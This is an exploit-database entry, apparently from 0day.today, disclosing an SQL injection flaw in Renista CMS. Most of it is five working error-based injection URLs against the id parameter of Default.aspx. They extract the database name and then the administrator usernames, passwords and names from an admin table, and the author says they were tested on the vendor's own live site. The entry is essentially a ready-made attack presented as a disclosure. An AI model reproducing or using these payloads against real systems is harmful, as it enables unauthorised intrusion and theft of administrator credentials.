Renista CMS SQL Injection Vulnerability

🗓️ 20 May 2010 00:00:00Reported by n/aType

zdt🔗 0day.today👁 17 Views

Renista CMS SQL Injection Vulnerability on http://www.rayaco.com. Database name, username, password, and more can be accessed through specific URLs. Discovered and reported for notification purposes

=======================================
Renista CMS SQL Injection Vulnerability
=======================================


Test on CMS Owner site :http://www.rayaco.com  
                     
# db name :
http://server/rtl/Default.aspx?ln=Fa&id=3' and 1=convert(int,db_name())--
 
# cont user :
http://server/rtl/Default.aspx?ln=Fa&id=3' and 1=convert(int,(SELECT TOP 1 cast(count(*) as nvarchar(4000))%2bchar(126) FROM Portal_BehPardazco..TBAdmin ))--
 
# username :
http://server/rtl/Default.aspx?ln=Fa&id=3' and 1=convert(int,(SELECT TOP 1 cast(UserName as nvarchar(4000))%2bchar(126) FROM (SELECT TOP 1 * FROM Portal_BehPardazco..TBAdmin order by Ln asc) sq order by Ln desc))--
 
# password :
http://server/rtl/Default.aspx?ln=Fa&id=3' and 1=convert(int,(SELECT TOP 1 cast(Password as nvarchar(4000))%2bchar(126) FROM (SELECT TOP 1 * FROM Portal_BehPardazco..TBAdmin order by Ln asc) sq order by Ln desc))--
# name :
http://server/rtl/Default.aspx?ln=Fa&id=3' and 1=convert(int,(SELECT TOP 1 cast(Name as nvarchar(4000))%2bchar(126) FROM (SELECT TOP 1 * FROM Portal_BehPardazco..TBAdmin order by Ln asc) sq order by Ln desc))--
========================
I tried and finally find bug at this CMS ( Renista ) but i dont wanna any damage for the company, just for fun and NOTIFICATION .
 
Special thanks to llvllr_special ,shabgard.org,Emperor, and other Iranian Hecker ...



#  0day.today [2018-03-12]  #

20 May 2010 00:00Current

7.1High risk

Vulners AI Score7.1